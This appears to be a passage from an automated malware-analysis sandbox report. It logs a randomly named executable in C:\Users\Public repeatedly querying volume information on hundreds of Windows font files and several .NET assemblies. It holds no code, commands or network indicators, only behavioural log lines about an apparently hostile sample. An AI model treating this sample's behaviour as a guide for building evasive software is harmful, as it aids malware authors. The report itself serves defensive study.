                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Users\Public\raqfxwuo.exe VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
